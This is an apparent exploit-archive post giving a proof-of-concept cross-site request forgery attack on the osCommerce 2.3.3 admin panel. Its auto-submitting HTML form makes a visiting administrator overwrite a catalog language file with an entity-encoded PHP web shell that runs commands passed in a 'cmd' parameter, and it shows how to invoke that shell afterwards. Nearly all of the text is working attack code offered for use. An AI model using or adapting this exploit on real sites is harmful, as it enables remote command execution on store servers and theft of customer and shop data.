osCommerce 2.3.3 Cross Site Request Forgery

Posted on 12 February 2013
<?php
 /*
 * this is simple proof-of-c0ncept for csrf in latest
osCommerce (2.3.3).
 *
 * Admin, after visiting this page, will add php-shell-code to file:
 * ./catalog/includes/languages/english/download.php, so now if we
 * add 'cmd' param to this file, our 'shell' will print command output.
 *
 * --- there should be more this kind of bugs in this webapp.
 * 22.o1.2o13 o/
 */
?>

<html><body onload="document.runCSRF.submit();">
<form method="post" name="runCSRF"
action="http://oscommerce-2.3.3/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">
<input type="hidden" name="file_contents"
value="&#x3c;&#x3f;&#x70;&#x68;&#x70;&#x20;&#x24;&#x63;&#x6d;&#x64;&#x20;&#x3d;&#x20;&#x24;&#x5f;&#x47;&#x45;&#x54;&#x5b;&#x27;&#x63;&#x6d;&#x64;&#x27;&#x5d;&#x3b;&#x20;&#x65;&#x63;&#x68;&#x6f;&#x20;&#x27;&#x3c;&#x70;&#x72;&#x65;&#x3e;&#x27;&#x20;&#x2e;&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x5f;&#x65;&#x78;&#x65;&#x63;&#x28;&#x24;&#x63;&#x6d;&#x64;&#x29;&#x20;&#x2e;&#x20;&#x27;&#x3c;&#x2f;&#x70;&#x72;&#x65;&#x3e;&#x27;&#x3b;&#x20;&#x3f;&#x3e;">

</form>your shell should be here:
catalog/includes/languages/english/download.php?cmd=id<br></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20